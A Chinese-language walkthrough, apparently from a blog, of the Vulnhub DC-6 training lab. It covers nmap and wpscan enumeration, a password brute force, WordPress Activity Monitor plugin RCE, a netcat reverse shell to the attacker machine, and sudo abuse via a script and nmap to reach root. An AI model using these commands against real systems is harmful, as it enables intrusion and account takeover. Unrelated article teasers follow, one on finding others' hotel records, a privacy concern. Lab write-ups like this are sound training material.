Vulnhub靶机渗透测试之DC-6-wordpress+nmap提权

访客4年前黑客资讯696

Vulnhub简介

Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。

靶场部署

vulnhub官网:https://www.vulnhub.com

下载地址:https://download.vulnhub.com/dc/DC-6.zip

1、直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本的);

2、解压会得到一个.ova的文件,然后在VMware中打开即可;

环境配置

攻击机kali:192.168.2.19

DC靶机:192.168.2.25

(我两者都是用的桥接模式,更好都再做一个快照吧,以防万一)

虚拟机打开如下所示:

1611229972_60096b146471a7d27a2da.png!small?1611229973843

信息收集

靶机官网给出的两个线索:

需要去配置一下hosts文件

1611230709_60096df5819c8355fdde6.png!small?1611230711028

kali里面的密码本

1611230231_60096c17cbf0b6da74e58.png!small?1611230233616

1、使用nmap进行扫描,开放了22和80端口

1611230344_60096c88ed11d19c33512.png!small?1611230346547

2、直接访问80端口是不能够解析出来的,我们需要去配置一下hosts文件

Windows系统下在 C:\windows\system32\drivers\etc\hosts

打开后在末尾添加:192.168.2.25 wordy

Linux系统下在/etc/hosts

vim /etc/hosts

添加 192.168.2.25 wordy

1611231249_60097011eca3333407a01.png!small?1611231255272

3、查看了一下没有什么发现,扫描一下目录,扫描出了登陆界面,尝试一些弱口令,没有登陆进去

1611231923_600972b3e28b6b10973b7.png!small?1611231925287

4、既然是WordPress的网站,可以用它专门的扫描工具来扫描一下,wpscan,这个是kali里面自带的工具。

而且也找得到了后台登陆页面,题目也提示了密码本,所以可以寻找一下用户名。

1611232105_60097369c494dea4d6e78.png!small?1611232107300

爆破

1、找到五个用户名:admin、mark、graham、sarah、jens,将用户名放到一个文件里作为用户名,然后再将rockyou.txt里面的带有k01的导出作为密码,进行爆破。

vim dc-username.txt #将用户名放到其中

gunzip rockyou.txt.gz rockyou.txt #解压密码本

cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6-passwd.txt #将带有k01的密码导到dc6-paswd.txt中

1611233732_600979c42c4ec75d7f8bc.png!small?16112337336392、使用wpscan来爆破

wpscan --url http://wordy/-U dc6-username.txt -P dc6-passwd.txt

找到mark的密码为:helpdesk01

1611234214_60097ba60e79867f70f48.png!small?1611234215477

3、登陆后台

1611234333_60097c1daef7050e7e95c.png!small?1611234335181

后台插件getshell

1、利用Activity monitor插件的rce漏洞来getshell

1611234428_60097c7c9484c65ad5897.png!small?1611234429993

2、点击Activity monitor -> Tools

1611235164_60097f5cd21c5f645d6e4.png!small?1611235166367

3、执行命令的同时使用burp抓包,发送到repeater模块。

前端限制了只能填写15个字符,可以F12修改长度。

1611236429_6009844d19b58927e3015.png!small?1611236430505

1611236515_600984a3bfbcf5f638403.png!small?1611236517265

4、反弹shell

kali终端上:nc -lvvp 4444

burp抓包修改为:nc 192.168.2.19 4444 -e /bin/bash

1611236629_60098515626bdd34a1d70.png!small?1611236630894

1611236643_60098523816e2a72f7544.png!small?1611236644885

5、获取一个稳定一点的shell终端

python -c 'import pty;pty.spawn("/bin/bash")'

1611236874_6009860a2118b31a418b0.png!small?1611236875550

水平越权

1、因为是登录了mark,所以只能查看mark用户下的文件,提示了graham用户的密码为:GSo7isUM1D4

1611237061_600986c56edf0acb41a3c.png!small?1611237062839

2、成功越权到graham用户下

1611237224_600987685657654359a02.png!small?1611237225657

提权

1、使用sudo -l查看用户有哪些命令操作

可以看到允许graham用户在不深入jens用户密码的情况下,使用jens身份执行/home/jens/backups.sh这个脚本文件

1611237476_600988643a2dc9d377244.png!small?1611237477727

2、查看一下脚本内容

cat /home/jens/backups.sh

1611237692_6009893cdc02d8969d8f9.png!small?1611237694364

3、我们现在可以执行这个脚本,而且该脚本也在jens的目录下,那可以将/bin/bash写到这个脚本中,再以jens用户来执行这个脚本,那我们就可以获得jens的shell了。

1611238134_60098af697003fe943f70.png!small?1611238135931

4、查看一下jens有哪些执行操作

1611238247_60098b67a95edc38a0258.png!small?1611238249380

5、使用nmap脚本提权

发现是可以使用nmap的root权限,将反弹shell的命令写入到脚本中,然后使用nmap来执行脚本就可以获得root用户的shell了

echo 'os.execute("/bin/bash")' > shell

sudo nmap --script=shell

1611238626_60098ce2ef6d68d4278dc.png!small?1611238628801

知识点总结

1、信息收集

2、wpscan工具的使用,枚举用户名,爆破登录

3、WordPress 插件 activity monitor 远程代码执行漏洞

4、用户之间的水平越权,就是用户的切换

5、使用nmap来提权

相关文章

dnf荒古武器怎么获得(三种方法获取荒古武器)

见到86级的鬼剑士大伙儿一点也不感觉怪异,终究90级的鬼剑士因为我看到过。可是大伙儿留意看他的上下槽及其武器装备栏武器装备。没有错,便是荒古光剑跟艾格尼丝,难道说如今的巨头全是那样玩的?不觉醒玩到86...

习惯早起,牛来哒,欢欣炸年兽,免费赚1.6元!

习惯早起是一个类似爱上早起的打卡免费赚钱微信小程序,实在就是看视频广告赚钱,一天可以只0.5米,满1米提现。牛来哒是一个合成模式APP,新用户可直接提现0.3米。欢欣炸年兽,新用户可以提现0.3米,但...

穷人赚钱门路有哪些,教你赚钱快的技巧!

穷人赚钱门路有哪些,教你赚钱快的技巧!

1、创业书籍销售 在新增的创业者当中,很大一部分是初次创业,缺少相关的知识和经验,因此对创业所需的书籍和资料存在着不小的需求。适合创业者的书籍主要有以下几种:营销类、管理类、技术类、励志类等。如果货...

妈妈我想吃烤山药是什么意思 妈妈我想吃烤山药出处是什么

妈妈我想吃烤山药,这个是抖音上近期火起來的梗,大伙儿了解代表什么意思吗?这一梗的出處也是哪儿呢?下边我产生详细介绍。 妈妈我想吃烤山药梗出處 该梗的原因:是一名网民偶然间拍下了一名卖烤山药的老大爷...

怎么查开的房记录,教你怎么查询

假如你碰到什么事情,一定是必须查开过酒店开房记录得话。那么你一定需看回来,看看我是怎样教你一直在碰到那样的事儿的情况下要怎么做。假如你选用了不适当的方式,那麼你肯定是查不出的,因此一定要选用恰当的方式...

黑客追杀马斯克(黑客帝国马斯克)

黑客追杀马斯克(黑客帝国马斯克)

本文导读目录: 1、马斯克脑控黑科技,可能会为黑客攻击大脑、篡改记忆留下后门吗? 2、为防止黑客入侵 特斯拉将推“双重认证”功能 3、推特遭大规模黑客入侵,为何仅仅入侵一些知名人士? 4、...